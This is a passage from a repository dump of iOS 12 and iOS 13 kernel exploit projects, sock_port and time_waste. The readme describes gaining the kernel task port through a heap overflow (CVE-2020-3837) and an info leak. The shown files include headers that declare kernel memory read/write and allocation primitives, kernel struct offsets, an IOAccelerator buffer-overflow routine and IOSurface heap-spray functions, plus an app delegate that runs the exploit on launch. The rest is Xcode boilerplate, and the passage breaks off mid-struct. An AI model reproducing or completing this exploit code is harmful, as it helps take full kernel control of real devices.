wk32(uint64_t where, uint32_t what); 30 | void wk64(uint64_t where, uint64_t what); 31 | 32 | void kfree(mach_vm_address_t address, vm_size_t size); 33 | uint64_t kalloc(vm_size_t size); 34 | 35 | uint64_t find_port(mach_port_name_t port, uint64_t task_self); 36 | 37 | #endif /* kernel_memory_h */ 38 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/main.m: -------------------------------------------------------------------------------- 1 | // 2 | // main.m 3 | // sock_port 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | #import "AppDelegate.h" 11 | 12 | int main(int argc, char * argv[]) { 13 | @autoreleasepool { 14 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class])); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port/offsets.h: -------------------------------------------------------------------------------- 1 | enum kstruct_offset { 2 | /* struct task */ 3 | KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE, 4 | KSTRUCT_OFFSET_TASK_REF_COUNT, 5 | KSTRUCT_OFFSET_TASK_ACTIVE, 6 | KSTRUCT_OFFSET_TASK_VM_MAP, 7 | KSTRUCT_OFFSET_TASK_NEXT, 8 | KSTRUCT_OFFSET_TASK_PREV, 9 | KSTRUCT_OFFSET_TASK_ITK_SELF, 10 | KSTRUCT_OFFSET_TASK_ITK_SPACE, 11 | KSTRUCT_OFFSET_TASK_BSD_INFO, 12 | 13 | /* struct ipc_port */ 14 | KSTRUCT_OFFSET_IPC_PORT_IO_BITS, 15 | KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES, 16 | KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE, 17 | KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT, 18 | KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER, 19 | KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT, 20 | KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG, 21 | KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT, 22 | KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS, 23 | 24 | /* struct proc */ 25 | KSTRUCT_OFFSET_PROC_PID, 26 | 
KSTRUCT_OFFSET_PROC_P_FD, 27 | 28 | /* struct filedesc */ 29 | KSTRUCT_OFFSET_FILEDESC_FD_OFILES, 30 | 31 | /* struct fileproc */ 32 | KSTRUCT_OFFSET_FILEPROC_F_FGLOB, 33 | 34 | /* struct fileglob */ 35 | KSTRUCT_OFFSET_FILEGLOB_FG_DATA, 36 | 37 | /* struct socket */ 38 | KSTRUCT_OFFSET_SOCKET_SO_PCB, 39 | 40 | /* struct pipe */ 41 | KSTRUCT_OFFSET_PIPE_BUFFER, 42 | 43 | /* struct ipc_space */ 44 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE, 45 | KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE, 46 | 47 | KFREE_ADDR_OFFSET, 48 | }; 49 | 50 | int koffset(enum kstruct_offset offset); 51 | void offsets_init(void); 52 | 53 | extern uint32_t create_outsize; 54 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_UITests/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | BNDL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 22 | 23 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_UITests/socket_freeUITests.m: -------------------------------------------------------------------------------- 1 | // 2 | // sock_portUITests.m 3 | // sock_portUITests 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface sock_portUITests : XCTestCase 12 | 13 | @end 14 | 15 | @implementation sock_portUITests 16 | 17 | - (void)setUp { 18 | [super setUp]; 19 | 20 | // Put setup code here. This method is called before the invocation of each test method in the class. 
21 | 22 | // In UI tests it is usually best to stop immediately when a failure occurs. 23 | self.continueAfterFailure = NO; 24 | // UI tests must launch the application that they test. Doing this in setup will make sure it happens for each test method. 25 | [[[XCUIApplication alloc] init] launch]; 26 | 27 | // In UI tests it’s important to set the initial state - such as interface orientation - required for your tests before they run. The setUp method is a good place to do this. 28 | } 29 | 30 | - (void)tearDown { 31 | // Put teardown code here. This method is called after the invocation of each test method in the class. 32 | [super tearDown]; 33 | } 34 | 35 | - (void)testExample { 36 | // Use recording to get started writing UI tests. 37 | // Use XCTAssert and related functions to verify your tests produce the correct results. 38 | } 39 | 40 | @end 41 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_tests/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | BNDL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | 22 | 23 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 12/tfp0 Kernel Exploits/sock_port/sock_port_tests/socket_freeTests.m: -------------------------------------------------------------------------------- 1 | // 2 | // sock_portTests.m 3 | // sock_portTests 4 | // 5 | // Created by Jake James on 7/17/19. 6 | // Copyright © 2019 Jake James. All rights reserved. 
7 | // 8 | 9 | #import 10 | 11 | @interface sock_portTests : XCTestCase 12 | 13 | @end 14 | 15 | @implementation sock_portTests 16 | 17 | - (void)setUp { 18 | [super setUp]; 19 | // Put setup code here. This method is called before the invocation of each test method in the class. 20 | } 21 | 22 | - (void)tearDown { 23 | // Put teardown code here. This method is called after the invocation of each test method in the class. 24 | [super tearDown]; 25 | } 26 | 27 | - (void)testExample { 28 | // This is an example of a functional test case. 29 | // Use XCTAssert and related functions to verify your tests produce the correct results. 30 | } 31 | 32 | - (void)testPerformanceExample { 33 | // This is an example of a performance test case. 34 | [self measureBlock:^{ 35 | // Put the code you want to measure the time of here. 36 | }]; 37 | } 38 | 39 | @end 40 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/readme.md: -------------------------------------------------------------------------------- 1 | This is iOS 13 stuff. Offsets, tools, changes, exploits, etc. 2 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/readme.md: -------------------------------------------------------------------------------- 1 | Only the most stable one is linked here. 2 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/README.md: -------------------------------------------------------------------------------- 1 | # time_waste 2 | 3 | iOS 12.0-13.3 tfp0 for all devices (in theory) using heap overflow bug by Brandon Azad (CVE-2020-3837) and cuck00 info leak by Siguza (will probably remove in the future). Exploitation is mostly the same as oob_timestamp with a few differences. 
The main difference is that this one does not rely on hardcoded addresses and thus should be more reliable. The rest of the code is under GPL (exception given to the unc0ver team) 4 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GeoSn0w/OpenJailbreak/0acf2c4ea664c3cffb3492fae566838c2ba9abfd/iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/project.xcworkspace/xcuserdata/jakejames.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 9 | 21 | 22 | 23 | 25 | 37 | 38 | 39 | 41 | 53 | 54 | 55 | 57 | 69 | 70 | 71 | 73 | 85 | 86 | 87 | 89 | 101 | 102 | 103 | 104 | 105 | 
-------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste.xcodeproj/xcuserdata/jakejames.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | time_waste.xcscheme_^#shared#^_ 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | @end 16 | 17 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 
7 | // 8 | 9 | #import "AppDelegate.h" 10 | #import "exploit.h" 11 | 12 | @interface AppDelegate () 13 | 14 | @end 15 | 16 | @implementation AppDelegate 17 | 18 | 19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 20 | 21 | get_tfp0(); 22 | 23 | return YES; 24 | } 25 | 26 | @end 27 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | 
"size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOAccelerator_stuff.h: -------------------------------------------------------------------------------- 1 | // 2 | // IOAccelerator_stuff.h 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 
7 | // 8 | 9 | #ifndef IOAccelerator_stuff_h 10 | #define IOAccelerator_stuff_h 11 | 12 | #import 13 | #import 14 | #import 15 | #import 16 | 17 | #include "IOSurface_stuff.h" 18 | 19 | #define IOAccelCommandQueue2_type 4 20 | #define IOAccelSharedUserClient2_type 2 21 | #define IOAccelSharedUserClient2_create_shmem_selector 5 22 | #define IOAccelSharedUserClient2_destroy_shmem_selector 6 23 | #define IOAccelCommandQueue2_set_notification_port_selector 0 24 | #define IOAccelCommandQueue2_submit_command_buffers_selector 1 25 | 26 | struct IOAccelDeviceShmemData { 27 | void *data; 28 | uint32_t length; 29 | uint32_t shmem_id; 30 | }; 31 | 32 | struct IOAccelCommandQueueSubmitArgs_Header { 33 | uint32_t field_0; 34 | uint32_t count; 35 | }; 36 | 37 | struct IOAccelCommandQueueSubmitArgs_Command { 38 | uint32_t command_buffer_shmem_id; 39 | uint32_t segment_list_shmem_id; 40 | uint64_t notify_1; 41 | uint64_t notify_2; 42 | }; 43 | 44 | struct IOAccelSegmentListHeader { 45 | uint32_t field_0; 46 | uint32_t field_4; 47 | uint32_t segment_count; 48 | uint32_t length; 49 | }; 50 | 51 | struct IOAccelSegmentResourceList_ResourceGroup { 52 | uint32_t resource_id[6]; 53 | uint8_t field_18[48]; 54 | uint16_t resource_flags[6]; 55 | uint8_t field_54[2]; 56 | uint16_t resource_count; 57 | }; 58 | 59 | struct IOAccelSegmentResourceListHeader { 60 | uint64_t field_0; 61 | uint32_t kernel_commands_start_offset; 62 | uint32_t kernel_commands_end_offset; 63 | int total_resources; 64 | uint32_t resource_group_count; 65 | struct IOAccelSegmentResourceList_ResourceGroup resource_groups[]; 66 | }; 67 | 68 | struct IOAccelKernelCommand { 69 | uint32_t type; 70 | uint32_t size; 71 | }; 72 | 73 | struct IOAccelKernelCommand_CollectTimeStamp { 74 | struct IOAccelKernelCommand command; 75 | uint64_t timestamp; 76 | }; 77 | 78 | kern_return_t IOAccelSharedUserClient2_create_shmem(size_t size, struct IOAccelDeviceShmemData *shmem); 79 | kern_return_t 
IOAccelSharedUserClient2_destroy_shmem(uint32_t shmem_id); 80 | kern_return_t IOAccelCommandQueue2_set_notification_port(mach_port_t notification_port); 81 | kern_return_t IOAccelCommandQueue2_submit_command_buffers(const struct IOAccelCommandQueueSubmitArgs_Header *submit_args, size_t size); 82 | 83 | int alloc_shmem(uint32_t buffer_size, struct IOAccelDeviceShmemData *cmdbuf, struct IOAccelDeviceShmemData *seglist); 84 | int overflow_n_bytes(uint32_t buffer_size, int n, struct IOAccelDeviceShmemData *cmdbuf, struct IOAccelDeviceShmemData *seglist); 85 | int make_buffer_readable_by_kernel(void *buffer, uint64_t n_pages); 86 | 87 | int init_IOAccelerator(void); 88 | void term_IOAccelerator(void); 89 | 90 | extern io_connect_t IOAccelCommandQueue2; 91 | extern io_connect_t IOAccelSharedUserClient2; 92 | extern io_service_t IOGraphicsAccelerator2; 93 | 94 | #endif /* IOAccelerator_stuff_h */ 95 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOKit/OSMessageNotification.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. Please obtain a copy of the License at 10 | * http://www.opensource.apple.com/apsl/ and read it before using this 11 | * file. 
12 | * 13 | * The Original Code and all software distributed under the License are 14 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 15 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 16 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 17 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 18 | * Please see the License for the specific language governing rights and 19 | * limitations under the License. 20 | * 21 | * @APPLE_LICENSE_HEADER_END@ 22 | */ 23 | /* 24 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved. 25 | * 26 | * HISTORY 27 | * 28 | */ 29 | 30 | #ifndef __OS_OSMESSAGENOTIFICATION_H 31 | #define __OS_OSMESSAGENOTIFICATION_H 32 | 33 | #ifdef __cplusplus 34 | extern "C" { 35 | #endif 36 | 37 | #include 38 | #include "IOReturn.h" 39 | 40 | enum { 41 | kFirstIOKitNotificationType = 100, 42 | kIOServicePublishNotificationType = 100, 43 | kIOServiceMatchedNotificationType = 101, 44 | kIOServiceTerminatedNotificationType = 102, 45 | kIOAsyncCompletionNotificationType = 150, 46 | kIOServiceMessageNotificationType = 160, 47 | kLastIOKitNotificationType = 199 48 | }; 49 | 50 | enum { 51 | kOSNotificationMessageID = 53, 52 | kOSAsyncCompleteMessageID = 57, 53 | kMaxAsyncArgs = 16 54 | }; 55 | 56 | enum { 57 | kIOAsyncReservedIndex = 0, 58 | kIOAsyncReservedCount, 59 | 60 | kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount, 61 | kIOAsyncCalloutRefconIndex, 62 | kIOAsyncCalloutCount, 63 | 64 | kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount, 65 | kIOMatchingCalloutRefconIndex, 66 | kIOMatchingCalloutCount, 67 | 68 | kIOInterestCalloutFuncIndex = kIOAsyncReservedCount, 69 | kIOInterestCalloutRefconIndex, 70 | kIOInterestCalloutServiceIndex, 71 | kIOInterestCalloutCount 72 | }; 73 | 74 | enum { 75 | kOSAsyncRefCount = 8, 76 | kOSAsyncRefSize = 32 77 | }; 78 | typedef natural_t OSAsyncReference[kOSAsyncRefCount]; 79 | 80 | struct OSNotificationHeader { 81 | 
vm_size_t size; /* content size */ 82 | natural_t type; 83 | OSAsyncReference reference; 84 | 85 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 86 | unsigned char content[]; 87 | #else 88 | unsigned char content[0]; 89 | #endif 90 | }; 91 | 92 | struct IOServiceInterestContent { 93 | natural_t messageType; 94 | void * messageArgument[1]; 95 | }; 96 | 97 | struct IOAsyncCompletionContent { 98 | IOReturn result; 99 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 100 | void * args[]; 101 | #else 102 | void * args[0]; 103 | #endif 104 | }; 105 | 106 | #ifndef __cplusplus 107 | typedef struct OSNotificationHeader OSNotificationHeader; 108 | typedef struct IOServiceInterestContent IOServiceInterestContent; 109 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent; 110 | #endif 111 | 112 | #ifdef __cplusplus 113 | } 114 | #endif 115 | 116 | #endif /* __OS_OSMESSAGENOTIFICATION_H */ 117 | 118 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOKit/Readme.md: -------------------------------------------------------------------------------- 1 | IOKit for iOS SDK7.0 2 | ======= 3 | 4 | ![](https://github.com/obaby/IOKit/blob/master/screenshot.jpg?raw=true) 5 | 6 | 在某些时候可能会用到IOKit来获取一些信息,但是将sdk从6.x升级到7.0的sdk之后就会发现那个libIOKit.dylib找不到了。晚上的办法是将6.x的sdk复制到7.0的sdk下,或者创建一个符号链接。 7 | 8 | 其实还有另外的一个解决办法,在7.0之后这个东西只是不是dylib了,而是成了一个framework。在这个目录下 9 | 10 | /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS7.0.sdk/System/Library/Frameworks/IOKit.framework,所以只需要将工程中的iokit用framework替换掉就可以了。另外这个并没有头文件,如果要用也得自己去提取相关的头文件。可以用classdump来生成。我用的是apple xun中的头文件,效果是一样的,这里整理了一下,需要的直接放入工程目录下引入IOKitLib.h就可以了。 -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/IOSurface_stuff.h: 
-------------------------------------------------------------------------------- 1 | // 2 | // IOSurface_stuff.h 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 7 | // 8 | 9 | #ifndef IOSurface_stuff_h 10 | #define IOSurface_stuff_h 11 | 12 | #import 13 | #import 14 | #import 15 | 16 | #import 17 | #import 18 | 19 | #import "offsets.h" 20 | 21 | #define IOSurfaceRootUserClient_create_surface_selector 6 22 | #define IOSurfaceRootUserClient_set_value_selector 9 23 | #define IOSurfaceRootUserClient_get_value_selector 10 24 | #define IOSurfaceRootUserClient_remove_value_selector 11 25 | #define IOSurfaceRootUserClient_increment_use_count_selector 14 26 | #define IOSurfaceRootUserClient_decrement_use_count_selector 15 27 | #define IOSurfaceRootUserClient_set_notify_selector 17 28 | 29 | struct IOSurfaceFastCreateArgs { 30 | uint64_t address; 31 | uint32_t width; 32 | uint32_t height; 33 | uint32_t pixel_format; 34 | uint32_t bytes_per_element; 35 | uint32_t bytes_per_row; 36 | uint32_t alloc_size; 37 | }; 38 | 39 | struct IOSurfaceLockResult { 40 | uint8_t _pad1[0x18]; 41 | uint32_t surface_id; 42 | uint8_t _pad2[0xdd0-0x18-0x4]; 43 | }; 44 | 45 | struct IOSurfaceValueArgs { 46 | uint32_t surface_id; 47 | uint32_t field_4; 48 | union { 49 | uint32_t binary[0]; 50 | char xml[0]; 51 | }; 52 | }; 53 | 54 | struct IOSurfaceValueResultArgs { 55 | uint32_t field_0; 56 | }; 57 | 58 | 59 | enum { 60 | kOSSerializeDictionary = 0x01000000U, 61 | kOSSerializeArray = 0x02000000U, 62 | kOSSerializeSet = 0x03000000U, 63 | kOSSerializeNumber = 0x04000000U, 64 | kOSSerializeSymbol = 0x08000000U, 65 | kOSSerializeString = 0x09000000U, 66 | kOSSerializeData = 0x0a000000U, 67 | kOSSerializeBoolean = 0x0b000000U, 68 | kOSSerializeObject = 0x0c000000U, 69 | 70 | kOSSerializeTypeMask = 0x7F000000U, 71 | kOSSerializeDataMask = 0x00FFFFFFU, 72 | 73 | kOSSerializeEndCollection = 0x80000000U, 74 | 75 | 
kOSSerializeBinarySignature = 0x000000d3U, 76 | }; 77 | 78 | int init_IOSurface(void); 79 | void term_IOSurface(void); 80 | 81 | int IOSurface_setValue(struct IOSurfaceValueArgs *args, size_t args_size); 82 | int IOSurface_getValue(struct IOSurfaceValueArgs *args, int args_size, struct IOSurfaceValueArgs *output, size_t *out_size); 83 | int IOSurface_removeValue(struct IOSurfaceValueArgs *args, size_t args_size); 84 | 85 | int IOSurface_remove_property(uint32_t key); 86 | int IOSurface_kalloc(void *data, uint32_t size, uint32_t kalloc_key); 87 | int IOSurface_kalloc_spray(void *data, uint32_t size, int count, uint32_t kalloc_key); 88 | int IOSurface_empty_kalloc(uint32_t size, uint32_t kalloc_key); 89 | 90 | int IOSurface_kmem_alloc(void *data, uint32_t size, uint32_t kalloc_key); 91 | int IOSurface_kmem_alloc_spray(void *data, uint32_t size, int count, uint32_t kalloc_key); 92 | 93 | extern uint32_t pagesize; 94 | extern io_connect_t IOSurfaceRoot; 95 | extern io_service_t IOSurfaceRootUserClient; 96 | extern uint32_t IOSurface_ID; 97 | 98 | #endif /* IOSurface_stuff_h */ 99 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | $(PRODUCT_BUNDLE_PACKAGE_TYPE) 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | 
UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/ViewController.h: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.h 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface ViewController : UIViewController 12 | 13 | 14 | @end 15 | 16 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/ViewController.m: -------------------------------------------------------------------------------- 1 | // 2 | // ViewController.m 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 7 | // 8 | 9 | #import "ViewController.h" 10 | 11 | @interface ViewController () 12 | 13 | @end 14 | 15 | @implementation ViewController 16 | 17 | - (void)viewDidLoad { 18 | [super viewDidLoad]; 19 | // Do any additional setup after loading the view. 20 | } 21 | 22 | 23 | @end 24 | -------------------------------------------------------------------------------- /iOS Exploits Collection/iOS 13/tfp0 Kernel Exploits/time_waste/time_waste/exploit.h: -------------------------------------------------------------------------------- 1 | // 2 | // exploit.h 3 | // time_waste 4 | // 5 | // Created by Jake James on 2/22/20. 6 | // Copyright © 2020 Jake James. All rights reserved. 
7 | // 8 | 9 | #ifndef expoit_h 10 | #define expoit_h 11 | 12 | #import 13 | #import 14 | #import 15 | #import 16 | #import 17 | 18 | #import "IOAccelerator_stuff.h" 19 | #import "IOSurface_stuff.h" 20 | #import "offsets.h" 21 | #import "exploit_utilities.h" 22 | #import "kernel_memory.h" 23 | 24 | int get_tfp0(void); 25 | 26 | #define IO_BITS_ACTIVE 0x80000000 27 | #define IOT_PORT 0 28 | #define IKOT_NONE 0 29 | #define IKOT_TASK 2 30 | #define IKOT_HOST_PRIV 4 31 | #define IKOT_CLOCK 25 32 | #define IKOT_IOKIT_CONNECT 29 33 | 34 | typedef volatile struct { 35 | uint32_t ip_bits; 36 | uint32_t ip_references; 37 | struct { 38 | uint64_t data; 39 | uint64_t type; 40 | } ip_lock; // spinlock 41 | struct { 42 | struct { 43 | struct { 44 | uint32_t flags; 45 | uint32_t waitq_interlock; 46 | uint64_t waitq_set_id; 47 | uint64_t waitq_prepost_id; 48 | struct { 49 | uint64_t next; 50 | uint64_t prev; 51 | } waitq_queue; 52 | } waitq; 53 | uint64_t messages; 54 | uint32_t seqno; 55 | uint32_t receiver_name; 56 | uint16_t msgcount; 57 | uint16_t qlimit; 58 | uint32_t pad; 59 | } port; 60 | uint64_t 